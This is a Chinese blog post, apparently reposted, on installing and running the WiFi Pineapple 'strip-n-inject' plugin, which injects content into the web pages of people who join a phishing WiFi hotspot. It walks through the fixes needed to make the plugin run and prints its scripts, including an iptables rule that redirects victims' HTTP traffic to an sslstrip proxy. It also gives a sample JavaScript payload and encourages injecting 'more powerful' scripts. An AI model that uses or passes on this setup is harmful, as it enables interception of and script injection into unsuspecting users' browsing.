WIFI菠萝 strip-n-inject插件安装与使用
来源:互联网 发布:管道放样软件 编辑:程序博客网 时间:2024/04/27 19:37
WIFI菠萝有一个strip-n-inject插件。可以在其他人连上钓鱼WIFI浏览网页时,在其网页源码末尾插入文字。当然包括HTML标签和Javascript代码。所以可以做到XSS攻击。
而一开始将strip-n-inject插件放到/pineapple/components/infusions/目录,打开Web页面,点Install按钮,一般是安装不成功的。
于是看了一下它的安装脚本:
/pineapple/components/infusions/strip-n-inject/includes/install.sh
#!/bin/shinstalled="0"# install depsopkg remove twisted-web --force-depends && opkg update && opkg install twisted-web && installed="1"if [ ! -e "/usr/lib/python2.7/site-packages/OpenSSL" ]; then ln -s /sd/usr/lib/python2.7/site-packages/OpenSSL /usr/lib/python2.7/site-packages/fiif [ ! -e "/usr/lib/python2.7/site-packages/twisted/web" ]; then ln -s /sd/usr/lib/python2.7/site-packages/twisted/web /usr/lib/python2.7/site-packages/twisted/fiif [ "${installed}" == "1" ]; then touch installedfi
从第六行可以看出,安装时卸载了twisted-web,然后又安装了一遍twisted-web。“twisted-web”是Python的一个Web应用开发框架。而WIFI菠萝也确实存在twisted-web。所以可以直接创建”installed“文件表示已安装。
# touch /pineapple/components/infusions/strip-n-inject/includes/installed
刷新网页后就显示安装好了。
不过只是点Start还是显示”Strip-N-Inject is not running...“。
原因很简单,插件运行时执行了/pineapple/components/infusions/strip-n-inject/includes/proxy/sslstrip.py脚本,并带上”/sd/tmp/proxy_inject.log“参数。显然,”/sd/tmp/“目录并不存在。
所以,我们可以创建这个目录:
# mkdir /sd/tmp
或者我们改动插件,指向”/tmp/“目录。
涉及到保存目录的文件有两个:include/data.php、include/start.sh。
include/data.php
<?phprequire("/pineapple/components/infusions/strip-n-inject/handler.php");global $directory, $rel_dir;require($directory."includes/vars.php");if (isset($_GET['proxylog'])){ if ($is_codeinject_running) { // get some info $log_cmd = "touch /sd/tmp/proxy_inject.log ; tail -n 50 /sd/tmp/proxy_inject.log"; exec ($log_cmd, $output1); foreach($output1 as $outputline1) { echo ("$outputline1\n"); } } else { echo "Strip-N-Inject is not running..."; }}?>只要更改14行,去掉两个”/sd“。
include/start.sh
#!/bin/bash# setup varsexport PATH=$PATH:/sd/usr/bin:/sd/usr/sbinattacker_ip="$(cat proxy/attacker_ip.txt)"# set our iptables redirectiptables -t nat -A PREROUTING ! -s "${attacker_ip}" -p tcp --destination-port 80 -j REDIRECT --to-ports 10000#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000# start sslstrip/inject proxycd proxypython sslstrip.py -s -k -f -w /sd/tmp/proxy_inject.log 2>&1 | at now &exit 0同样更改倒数第三行就可以了。
然后我们Start一下。
成功了。
然后就可以开始使用了。
点”Injection Code“,然后可以在文本框中输入要注入的内容。比如JavaScript代码:
<script>alert("哈哈哈。")</script>很简单,就是弹出写有”哈哈哈。“的对话框。
注意”Attacker IP“填好自己IP地址。当然,如果你在WIFI菠萝的父网段中也可以不设置。然后点Start
当其他人连上钓鱼WIFI并访问HTTP网页时(HTTPS没有):
当然也可以注入HTML标签:
当然远不止这样,你可以注入更牛逼的JS脚本。
如有谬误,望加指正。
转载注明出处:http://blog.csdn.net/qq_15983713/article/details/50242309
- WIFI菠萝 strip-n-inject插件安装与使用
- @Inject 使用
- 安装ButterKnife插件与使用ButterKnife插件
- Gsonformat插件安装与使用
- JSunpack-n的安装与简单使用
- Spring @Autowired与@Inject
- [Ruby] inject的使用
- Eclipse插件FatJar安装与使用
- 转:Eclipse插件FatJar安装与使用
- Eclipse插件FatJar安装与使用
- file_column插件的安装与使用
- Jode Eclipse 插件的安装与使用
- Eclipse插件FatJar安装与使用
- HibernateTools插件的安装与使用
- Eclipse插件FatJar安装与使用
- Eclipse插件FatJar安装与使用
- Eclipse插件FatJar安装与使用
- Eclipse插件FatJar安装与使用
- 《吴晓波频道》笔记
- Javascript 模块规范 CommonJS ,AMD ,CMD
- JavaScript 学习笔记(一)
- scala高级类型
- leetcode -- Swap Nodes in Pairs -- 简单重点
- WIFI菠萝 strip-n-inject插件安装与使用
- numa
- 黑马程序员——java基础之抽象与接口
- scala基本语法及注意点
- 《罗辑思维》笔记
- XML解析
- cocos2dx 消息推送
- Toast 的默认和自定义显示
- Heritrix 工具化